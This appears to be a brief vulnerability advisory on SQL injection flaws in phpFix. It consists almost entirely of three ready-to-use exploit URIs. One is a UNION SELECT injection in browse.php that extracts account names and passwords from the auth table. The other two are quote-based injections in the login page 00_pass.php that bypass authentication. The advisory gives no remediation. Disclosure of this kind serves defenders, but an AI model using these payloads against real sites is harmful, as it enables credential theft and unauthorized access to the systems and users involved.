phpFix Multiple SQL Injection Vulnerabilities

phpFix Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/phpfix/fix/browse.php?kind=-99+union+select+0,passwd,account,3,4,5,6,7,8,9,10,11+from+auth
http://www.example.com/phpfix/auth/00_pass.php?passwd=blah&account='+or+account+like+'blah%
http://www.example.com/phpfix/auth/00_pass.php?passwd=blah&account='+or+passwd+like+'blah%